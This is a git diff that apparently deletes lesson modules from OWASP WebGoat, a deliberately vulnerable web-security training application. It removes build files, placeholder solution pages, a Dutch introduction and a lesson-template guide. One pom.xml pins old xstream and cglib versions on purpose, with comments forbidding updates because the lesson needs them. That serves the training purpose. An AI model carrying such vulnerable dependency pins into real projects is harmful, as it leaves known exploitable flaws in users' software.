-									<goal>prepare-agent</goal>
-								</goals>
-							</execution>
-							<execution>
-								<id>default-report</id>
-								<phase>verify</phase>
-								<goals>
-									<goal>report</goal>
-								</goals>
-								<configuration>
-									<dataFile>${project.build.directory}/jacoco.exec</dataFile>
-									<outputDirectory>${project.reporting.outputDirectory}/jacoco</outputDirectory>
-									<excludes>
-										<exclude>**/SpoofCookie.*</exclude>
-									</excludes>
-								</configuration>
-							</execution>
-						</executions>
-					</plugin>
-				</plugins>
-			</build>
-		</profile>
-	</profiles>
-
-</project>
diff --git a/webgoat-lessons/sql-injection/.sonatype b/webgoat-lessons/sql-injection/.sonatype
deleted file mode 100644
index 12d612a2b..000000000
--- a/webgoat-lessons/sql-injection/.sonatype
+++ /dev/null
@@ -1,3 +0,0 @@
-#Sonatype CLM
-#Tue Oct 11 14:10:26 EDT 2016
-application.id=webgoat
diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml
deleted file mode 100644
index 5683ccc66..000000000
--- a/webgoat-lessons/sql-injection/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>sql-injection</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/en/SqlInjection_solution.adoc b/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/en/SqlInjection_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/en/SqlInjection_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/html/SqlInjection.html b/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/html/SqlInjection.html
deleted file mode 100644
index 42219764e..000000000
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/html/SqlInjection.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file
diff --git a/webgoat-lessons/ssrf/pom.xml b/webgoat-lessons/ssrf/pom.xml
deleted file mode 100755
index 094797f69..000000000
--- a/webgoat-lessons/ssrf/pom.xml
+++ /dev/null
@@ -1,26 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>ssrf</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/vulnerable-components/.gitignore b/webgoat-lessons/vulnerable-components/.gitignore
deleted file mode 100644
index b83d22266..000000000
--- a/webgoat-lessons/vulnerable-components/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-/target/
diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml
deleted file mode 100644
index dfc9104c6..000000000
--- a/webgoat-lessons/vulnerable-components/pom.xml
+++ /dev/null
@@ -1,54 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>vulnerable-components</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-    <dependencies>
-        <dependency>
-            <groupId>com.thoughtworks.xstream</groupId>
-            <artifactId>xstream</artifactId>
-            <version>1.4.5</version> <!-- do not update necessary for lesson -->
-        </dependency>
-        <dependency>
-            <groupId>cglib</groupId>
-            <artifactId>cglib-nodep</artifactId>
-            <version>2.2</version> <!-- do not update necessary for lesson -->
-        </dependency>
-        <dependency>
-            <groupId>ant</groupId>
-            <artifactId>ant-launcher</artifactId>
-            <version>1.6.5</version>
-        </dependency>
-        <dependency>
-            <groupId>ant</groupId>
-            <artifactId>ant</artifactId>
-            <version>1.6.5</version>
-        </dependency>
-        <dependency>
-            <groupId>xml-resolver</groupId>
-            <artifactId>xml-resolver</artifactId>
-            <version>1.2</version>
-        </dependency>
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>${maven-surefire-plugin.version}</version>
-                <configuration>
-                    <!-- Otherwise test will fail with JDK16 -->
-                    <argLine>
-                        --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED
-                    </argLine>
-                </configuration>
-            </plugin>
-        </plugins>
-    </build>
-</project>
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/en/VulnerableComponents_solution.adoc b/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/en/VulnerableComponents_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/en/VulnerableComponents_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/html/VulnerableComponents.html b/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/html/VulnerableComponents.html
deleted file mode 100644
index 543a816d3..000000000
--- a/webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/html/VulnerableComponents.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:VulnerableComponents_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file
diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml
deleted file mode 100644
index 956a8e686..000000000
--- a/webgoat-lessons/webgoat-introduction/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-introduction</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html b/webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html
deleted file mode 100644
index 74cc173b4..000000000
--- a/webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html
+++ /dev/null
@@ -1,8 +0,0 @@
-<!DOCTYPE html>
-<html xmlns:th="http://www.thymeleaf.org">
-
-<div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Introduction.adoc"></div>
-</div>
-
-</html>
diff --git a/webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/nl/Introduction.adoc b/webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/nl/Introduction.adoc
deleted file mode 100644
index 05633a84d..000000000
--- a/webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/nl/Introduction.adoc
+++ /dev/null
@@ -1,16 +0,0 @@
-== Wat is WebGoat?
----
-
-WebGoat is een applicatie die verschillende kwetsbaarheden uit de OWASP top 10 uitlegt en laat uittesten.
-
-Het bevat lessen, oefeningen en uitdagingen (de challenges). De lessen zijn onderverdeeld in een aantal categorien en daarin staan pagina's met informatie en oefeningen. De challenges moet je als laatste uitproberen. Deze zijn lastig en bevatten geen hints. 
-
-De opzet van WebGoat is om spelenderwijs alles te leren en te ervaren op het gebied van web security. Dit is geschikt voor zowel ontwikkelaars als testers.
-
-Voel je vrij om WebGoat eens flink uit te testen en je kennis en ervaring op dit gebied te verbeteren.
-
-Je moet met een hacking mindset proberen de WebGoat applicatie oefeningen op te lossen.
-
-Bedankt voor je interesse!
-
-*Het team van WebGoat*
diff --git a/webgoat-lessons/webgoat-lesson-template/.DS_Store b/webgoat-lessons/webgoat-lesson-template/.DS_Store
deleted file mode 100644
index ab84d891b6a2bb07bfb4635cfb3e8da1798bb04f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLPfQ$D82`S7(s>l@gF@LZQa44U;-YLzi)d39*kT*n6kT9}qBy%Vz{Fu@vopI?
z2@#D(+o(~a2QMbpKh<9J;z7N5v1v8NgEc8pFWx+vs0R-o{NB9bKYOe->AcOn-+SMm
zH*bIMmp6G20I;{9#R0+qpwJ_b@1SanBK+dnR6@R`k`O5$oLt7VGt~PhliL&>7y<?Y
z1_A~G1_A~G2L2BW&^KEYrNnn%dV@M(AYkB@WI*f>QF;U>d|Z_1Z5>p3M*zZdGJA#E
zTr>!yJ|=uzlt>;bC{qb#D*8tZl<8!T`f&*#7bVJcK>zT8{+rQ1p`iD68b9iV112N}
zb-+Ntz-9)-*}V)L$U`<WxAy#Q8jjo1v4o+r@@*B{6;`=J{CG{}W2qT?F6F9j!Rb}=
zXS|-F=^4L0sJb)D?IGJXSK4Z3#L(v^d0n4vxvF95`8BB%X~WX&xn8?qY0gASj+Ztx
zcV?2;59akEr4Fi=K4LgV#xM={DTRsOByXIbZ;y8#?v6#{2k&2qMd#xO4<3j`yAE|O
zEbw0xrSa}VJ*UQU3+FGq_x=YTUi|3t6-fg68wu>%K+4rsMl>gDX6QeNP@kkJvTZP#
z)A3Z+o?Uz6;Rl;eaZuifgdWM{B%{|?7-c)cJ$1c(lbjbE{ZZXiU8ATcRabW=`A&yO
zK9RL8|G%fRwpp09$WxP5&1`{!^&Znq8BgoZsH>lKMQhx#^KPFPIBHO?uubw>!QJVc
zYuJ`EqURk##x7OWNA@=FZ$Hp=<XZJ@J2|Umb?KrY*VKpS1n*<2lhrNFu%^dpH7wVd
zGW0yF34O<gEOl0wSq<SmjDMy~Xf&NuwkBdU&l7G4Hz~>)VeiZ9R7*39hW9b9DnkxU
zO%Bn*S{ZlP(32zpncBu;3fI`Msb+Ljn(kw9g%7ZFQO;i)JK15S24ifL$e*PdI?~)7
zeo*08l*h%pPpXc4I;UH!vwBET#)PLw({xQ~PVASf-<;@>4K6-Jdmsi!p&!N}3l_}5
z%kT=k3U9*&xCEcV7w|P)hO6)md=J-Q34Vf~;WzjL{)E2}kYOcOVKvrbBi@dC@eaHb
z+worPz&Lhc0(-CzlXwz`aRkS39J6TREZUgEXYeIFhv)H4d<);fi*i1pWtk>rf4Rnw
zskJII|Kcr_-b!YX{_2O5H$`SkRYF`fwY%!-eYN$htd=LEwF>b>Ay?f~!}4lxSjqKb
z+f5RTG_s~r;vFVg>1REi@a@+`G>fu*o{l+q{YXosRUr}ckaV|2VnU+4OnN=(X^d}^
zUJ{*<D=(McZbo7oV7x+hk46$gdt8yhEs-QsIBp@ck|KMTB=!k>315-KzJ(v)SNI+N
zCRtS=$KBX~5t3CC-i58$hWC)L4wI<5@c}%7$FLud;|UzVAre;_M?G<AIEB+_U>+ST
zU=h#av-li7k1ybh_!_>BZ%Daq5Zm!(nMw4-=!<REPA0X2n+5o>Yvyy$zv9tKcycqP
zcF1BXZ<)3=P2(&Jef_J0-i>3ROb#6u=l^4+@BeSy1cH$R1_B0dIs;gqOeK418l|>i
zan_E~^8`Jjh`2?GUJ6y~E&{0UAIH7eD20lggpZ37y;QP$sf7R0ML_WV55E6GfVX)0
E7jG~CjsO4v

diff --git a/webgoat-lessons/webgoat-lesson-template/getting-started.MD b/webgoat-lessons/webgoat-lesson-template/getting-started.MD
deleted file mode 100644
index 58467fd4b..000000000
--- a/webgoat-lessons/webgoat-lesson-template/getting-started.MD
+++ /dev/null
@@ -1,65 +0,0 @@
-### To include lesson template in build ###
-1. Edit the webgoat-server/pom.xml file and uncomment the section under  
-  ```xml  
-   <!--uncommment below to run/include lesson template in WebGoat Build-->  
-  ```
-
-2. Also uncomment in webgoat-lessons/pom.xml where it says    
-  ```xml  
-   <!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
-  ```  
-  
-### To add a lesson to WebGoat ###
-
-There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
-
-0. The POM file  
-
-    *  Change the line to give your lesson its own artifactId.   
-        That should be all you need to do there:  
-	```xml  
-	 <artifactId>webgoat-lesson-template</artifactId>  
-	```  
-1. The Base Class  
-
-    * The name of the class (file and class name) to better match your lesson. (e.g. `sql-injection` >> `SqlInjection`)  
-    * The category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added.   
-    * Implement a new key name pair `lesson-template.title` (the key) and update the same key/value pair `your.key=your value` in src/main/resources/i18n/WebGoatLabels.properties.  
-
-2. The HTML content framing  
-
-    * Rename the provided file in src/main/resources/html using the name of the lesson class.
-    * Modify that file following the commented instructions in there.   
-    * In conjunction with this file you.  
-
-3. Assignment Endpoints    
-    * In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these.  You will extend the `AssignmentEndpoint` as the example will show:  
-    * You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
-    * See other lesson examples for creating unit/integration tests for your project as well.
-
-4. Getting your lesson to show up  
-
-    * Modify the webgoat-lessons/pom.xml to include your project in the `<modules>` section:  
-        ```xml
-	  <modules>
-	             <!-- ... -->
-	     <module>webgoat-lesson-template</module>
-		     <!-- ... -->
-	  </modules>
-        ```
-	
-    * Modify the webgoat-server/pom.xml to add your project as a dependency in the `<dependencies>` section:   
-       ```xml
-         <dependencies>
-	             <!-- .... >
-           <dependency>
-              <groupId>org.owasp.webgoat.lesson</groupId>
-              <artifactId>your-artfifact-id-here</artifactId>
-              <version>${project.version}</version>
-           </dependency>
-                     <!-- .... >
-         </dependencies>
-       ```
-        
-
-5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template
diff --git a/webgoat-lessons/webgoat-lesson-template/pom.xml b/webgoat-lessons/webgoat-lesson-template/pom.xml
deleted file mode 100644
index 585329154..000000000
--- a/webgoat-lessons/webgoat-lesson-template/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-lesson-template</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/webgoat-lesson-template/src/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/.DS_Store
deleted file mode 100644
index 3d954c7e318a330d23d693ea397e1c5b5c52ee68..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLOKclO82*1JZFiGC#%a@T8%!;dprj;_G;e4t$8le@RRYetrD5&eCM(vvmUnFj
zqCgM=Dg+4eIB-FtJPMT%2gC^>aiJ=p!hs^S2QEkmI3aQ3fC~TYY>boCw+bqC$J+U4
z{@0AZ`81;$0Kj-&>jY2$K%$RJR!h|l3b*rbO$qs$8j?uykSaRalxe4^|JNGtKoKAi
zAP^uBAP^uBAaE-nKxZ~DQiXG0Sc5u1AVA=@M1b!PQTn)y`Ep4}Z|k7Sy8@7`Cbd_n
z&3J=k)R!?|E(u8%Dkwrpics{g7%0L?ANBoWzFZPggai7Q5A;Vy|AvCz=#)R|xdX<8
z4C(-Z0D-j#@Vk38WIzQ2tn&MNDr*{!+tG0iLsix5)^CvHnp*y2;hIO1b9OQ5s&3wi
ztGSb2&(QRg-yTujx#jk#ZJVXGni@Cs;tbn1WLvIkSbDB3^wfl5X?8Jg=Pk`Sl@$3V
z49%UJVf7<9y+ENOs-=$`j*&7<!+l(m`EQ0bEG)ElcJ~gnMLWCt7u%u>on2jf+oF9v
z-HVItM@edE?HN2Vm0f({+&k~S_x|}0E?yEapud&C)>W{4RgQ_~q|Frl3+`M3>I`Yu
zD9zc<WZKST%d(XMOs6m+UPeL>EhBrigsfbv42I)FGmPaO{bAiyU8A5UR9AOq*cOMt
zKAN^IAA^asZRRr;S;A@6Oy|j2A2iLR@r3S7y867!Thor6bB8>~NrPg!Zidxy42QF>
zVO!3)o^wdb@`a7{yY6gkY2Vwo@5-jlTUfYGmZu4Q%QemzdTy-9mtabD(z>M?*6c)q
z<8SJtmYUJSq06%DMQz`q$fq=#$_ZQJaT@zn5|)M?igJ=$hH^U9nk0DvyQ7Lc>d>^9
z>N_?y%kt=BL;~jcNn7{G%9yF9bdzba2)p+_S(zw^xwB)wva4HGCJFfrP1*@#o3HL4
zP?Xbr<m0O24rg_XW_8IQem~7>irWS?jn7GHjJ1e$Ym9Y>2IEK4PH2Mza0sR$4HgvP
zMR*BbhBx6Hd<37s=kO(b4VU3t_zteZ&+rTU3ctZ0a2@_eKp8h9!!Xui14i*KY{VvP
z$1d!_UhKmd9>E9k7#_zlJdG-*FpVZI;37VWPvKd76<@>G@eO<n&x`qlmg$-(BN#RD
zL#oP&=0CxOCT>Ku$e~S#<NpiMu5A?b+PbaY=i6Xu(L6Slv&5r@SbL8X%WJ-BJy%ff
z3XyQ<t_C?WMkLbbD>0XC5ES9wyQ8wqK+u@?o0=mL79#FSUb5Cb5t&ta4CPiLUxcmm
zxX8OiJDF8`Y~|hl0kW?5NXfhV4^S$}BOLF>n<*92hP9Sx6>0W1T!4?^Gx!27!Z+|e
z`~<(lpKu+kiCEiFAzIym5xg5)@E&X<YV~42-j5I9K0Jtr@u)|yQ5?rfoWg0MmyWYI
zhX&@*#R3*_9-qc%@L7BgpT}4JCEO~y9a%*;PRA16GIk=N<=r&E4^C*<^DMJz6>ZtM
z%6nxYnX^pWnx$;ZlwUc8pm%c+s1j)ue*ZsM`ThUq3>IVw5C{;sB@w{tL^2Vlsa4u;
z`CU6o-=p;L!u^(n^g^gw@en|L|2ppZM#+`O#C*9Vq!&thFO=ke^bio7|H1js33!{A
Fe*i$>2kHO-

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/.DS_Store
deleted file mode 100644
index 7ee598c2b590178fb052c7c2e0e89086ab62c78b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 10244
zcmeHMU2GIp6h3F$!t4Mt+k#!F3u{Uv#TF?oP!w=mihw|9+|oa)>+H_hj?T_(c4l``
ztk#hD7o+hfF)`7^R>f%KNu%+>#211w{v~MagT9y;^~uC16B9l6-r2e?+XoY&nA|&=
zd+yIU_ul#LH*@x$1pw?X7+nBy08r>=Qd>z`jl}xdeMt%hEgDHAdq|hOT-tWiRR7}=
zZP_3ZkO)WwBmxoviNMu>0Qqc|lodkCTp}P5kO(Xwz`hT0x|vJ_az;r0>7a}s0Z7(U
zGfz}z#{p&&4`d>cGeS}iB^0J4g((I{3>4<n9uM>qft(Rim;(lf4-96;;DmyFb{ap<
z)d3Si%3LBK5x5iq_PW%=y`V!8^vd&lI%iv+zirz*hU)4YmMvGp>I!yg5%tdGlv_&r
zx?k}6_54X*vkWsGlm~Txs$3p&U3;Odr-v=Gl+xDhcO75195Y{GIx%87hFj`)3y$GU
zB*l0mmf=sOw6%kIvq+|cx?>Joo|U$2%fDX<vn!>woIc&z)zh=PBi_~3JKYgK-PPT_
zy(7MBN6+-M_MM`%wD0IUHkO-ya(3>u*WWn%=J^W(1`IwW&{PG>CzY7klU>P-o6S||
zEZ}8(#X%A82)SjvzOBG3IuKEBOKFX4?Z<Pz<vQN5nfFMhwACJgcsS!a!LyBIT)U8U
zyp$Hn=ys-H>%Q4%+ezyI(;M~8Q$8z=dv4y}&lOXeR`AR_OwzN8<^XAXqZSRv)HDpg
zwQ}wH4Xv9yx9{3>an&`ewMe6?juWVkZ{1^=`4c6E?3nIlOvkXC$&n(1)i#G5J!?in
zpM}HR>e}Y0I$_Y*$6SNi8QOb_=xJ$=Mo+Sy{dtpeLs7WF#&}d6^4JpeKyg!>st(;p
zd#icDpzT}K=m}d-o3>_zh1u4d)aXc2K%*TA8oPVc=qN#-rA2!Y><F5BcSoalv6+wR
zo_{=NI<%?_H2vOvx2}pdNBhf<QvHaEGRCa>41-qNn%FEhG~All7Hq8o>tHK6x<fDl
zCgk7@JOxj~Gw>43!8v#rK7#Y`DSQrJz?U!&Kf+J&GyDR-!Ji0-sN!mjU?Vo+b$C6t
z;wEgvt=NM*aToStA0EadcodJ}Fs3k#88k4958^}kFwWo;_$<DNui`Au;X8N^-^UNc
znnGoY9;~1r74c)rDrp#m-9jU^Xc#-tq#j%v8qTj2<ZD{9Heh4l!j@KTVkMh6g#<@9
zcgo!0^!x`QFA_!9t#46dCx~L^sp?HHlR;Z92*k8E#$z!};hbUBO>I;S5wR6MR{NHi
zs?~A&vR-0lOl#moWmV#&s?~EUvuf{d>RrYe%c^_#Q7?$sht<PvF_pei|AuU{@HTwN
ziS`wI1K-0B@GJaI6l)-QHRC!WR}44c4cLx1Vh45-y?XIxyao5*0X#?~yPaq@L?j!<
zF&rnFnK+44Xki|GEMf^y;UjnkAH~P;aU$Jw_&mOVFXJm!bURc<x3iUW%en&tM#0Yj
zeC;)epIZx5%(}*+eYvT{zof-v-mzV0lICHQ4?~__K@VIgP$|R8|7YK{lli9Z|I9bl
zK&OV6s--3UmGoCj=C5iKQhF}wxh}KkszJO;9~K(o-ma$B-`;F-tr~u<##mJzj!!8w
ziNF#fP$%Y&v-tmk#sB|b!WGJ?B?1zG%Z&im4<rZrX_j)dp?X3VYmd`?H{C2Ty%{07
y31vJSPm+h@slvkXJj6n6<p2w_OHezLGeS~{(iQ(RK%W2Q`M-4KV$)aS`TsAcj4X8k

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/java/.DS_Store
deleted file mode 100644
index da3ec95ed2fb32595ebe59649631acf665cd4ed2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0UrZcD9LImZ1KPc9D|=96DPDU9h@}ETO9iy82OQGck`j;qMbEw46*lheUT*ge
z6j4kQ|HWwhlbD!jBB(VQ`=rtMVB$+tWBiv?BM<swV$>%SpG-{jH#<Y2P#%1!HR;Y}
z=Qsa;Gjreh+|11a0QMC0HUJd>Bzl-two!DM!0OqvA%sK;t3>h#H<z}YH0AzE=Qgws
z3IYWJ1p);E1p);E1^y2T(3#DGw8^>8YlApYAW-0%RDkUdF?yJd3%kIrzjaXLUjfLL
zQn4Q>t*`{yn6PnS7r3Pw3dmi_a#s{r4CL-q9uw{2!Y**j-2uhr1I5TFZYb!FPW{LH
z=74c-gE&wiP++41>}OK~4&-4fJ+t=yZkevv+PaLPlG3s*TcxnPjeV4ed{1)PnMrz@
zS8#i@{3$<Y>PA|m2Q_bcB|YRg*2T1z9x;uXl(Mteu|3VSjr<zd$x+kRotYk|VC(K=
zlJ_@i>fUrpsT#~1MRFa~Y-7Z9&9rHm-h)z@eNsy8++1^8dwW+?tgWqcz9}}>cHqGN
zrdY?p_W60`2T7`JJlH)jo|}Jqap{dW-#YX5x$|5E6dMUtt`p_6RYk0+wq(Z1u6>sw
zw6fgdAb-~pa?&}j)%R<(QWFvR&XiKY=6y2fnU3v_7<rd$N-1|qz+)N57T;?$<5-2P
z?WUASMzb;nOY@9w%SxIL8Sa>8%z7*};W~M**Ke3ol!9yAZBRS2Xe6k$J7!XMteJx0
zceYpU+FiG|d4I>D3p=hWS0WX%JVAomo_W7%<cDXNs^glQF>Kwmr$&oRQp*^!wX6{d
zeGv}(Ue{Nv@}y3E4>&sW)0Gb-UQ=7Gs;5{@Z{DC-mn7d|PfV4ETs8$wG^}rs<)H^?
zT@_b!+PF_vhb=8_Sc)FzZY{US>S&QmqZ}872ij$IjD*k9q}>QMiQ>*KRlS#ud_r@*
zlR3ktS)Hfh4<ET>hgz-ntbCRAUs00AnOC>2(`@VFd-;Ng>*B3q=_ROv7CPdN!Xy}w
zgVXQ~JPXgkE3gD-;eGf7&cWyKC42>6!!rB~zre5X8~g!(BOs!T<ru*Vti&7eMy$hn
zY`_+5$6K)jJFy#&;c+~H12}>yOk)Oh%;LlN2tJAn_!K^mFXQXDh)eh$p2ZLGBR;3l
z3ZDI9j>6!llvssOyl@MRUJk-&U!~lCbs${c&e5yfStVHPzPO<4mT)agK0urhpPUsk
zd^j(`@d5!_v#VB)4ijL;?D{2NK|$Hd@nNm^#G+9}@`+*D`Uc8|2y4mjt8rgcR!V$$
zSuJrHRmyx!S(b>Dl~NyMmhJ4K+ATh>EPMC})dK(Vuza{7D%0-tZ%|u=cj03nvv1%#
z_z`}B-{DUJtc>8Q#u`E^io5Y9Y{Z+f37ZM7PP`3o$3xhM{e;+E1lbTFHiqLkL68|Z
zh0|za9z87L49?<Xcp4waC-6x^?ge}iU&2@MwRNx^T?gBlRoJplBB2+&48XT;8Q(Jn
zhFM47q$W4L+5TBf=55Qdr>OrG&@UZ2$X$5_O85{eyZ`rX{{H{UPb3&2P#{p?swse_
ziDaUOhTm)}W_RrvJ@?VW0&BOxt?xpSe;p_5U&qO^dxak;9b*ZyabXv@r4kDN`HKMd
SkC7eH!TBGY|2~1&X7mqKp#rV|

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/java/org/.DS_Store
deleted file mode 100644
index 8339472c99d019461c40bd63bbc20760ebcabff9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0U1%It6vxlmB<<|9HM2=$CXL&!B*CU8G25ml(Y9{BOlun&+<Z5>&hCuK;Oxw@
zGrJp&(MZ8BMDYUzLBT|=DE3KFd=Pvo74ZwIm<N3kM12x`5(GW>&TQFint~Lx(7DUp
zb3e|xbN7FLduQ(e0QTq9D1ZzA0$t2X+bFw4V*TvekOE!{>qLqN$RrDPCTUp74ZePZ
zuYj+BuYj+BuYj+>)u8}Avsn^0dG5Qte(o#aD{xIJ!1jj-UChQjyX;!Nbx_8S0Awqv
znI|gKIe^DRJR9@uvTJ!Ljp?2q&<jQHh=Fc6^+%XH*_daSUF(Jey5WG{ozXj?Aiq1s
zMYua)%(Z^*E8r`zQ33X|sR9cMpn$#Z{Qg%mW9YWi*|~;+ipr`jTZN#wjeVq$cu#!Z
zD#RVd$=Ur%_7tz_s+RQ1qlz<MERR{1aj~o<Cv>flkaiAOrlaVlmMsaLozzX$D)d`9
zQ?+N~?s${B>dYsky3wqbr_fQw)FyOWPwIy5JSYU&Cm}U1F1AOzx_a9p(P+<7TVyeM
z;K2U2NcX|6r6uVHL1=6}*f%nrS$cY9^^G^*I`j6q^R5u+Z6;7#Cd_B+RWatG@syR$
zlz5eBX4v^r_nk+;Dr)w9iDvR(NW3#4)v)=W%s9Gb+7nvVCYz9|Z4&ZW$}+w0H<_}G
zT-vk~QYfVushpuWTAyLW^@lWj%Fz}aR+_P`tTVtJ6Oxp(wYxR))AQOOdD~Mu4aeLh
z48F6yZrARnz3uzE4_(-CU9}Xd5ycr2)^zmybuBwyVCqgQc1kl<-JF}uGieQN%v91^
zDDXuv$fK^Wm&I9?#vZX$7N<%d2yRbfy)2(%Jp);da#av`z@CUKj@fJqis#teB8p=V
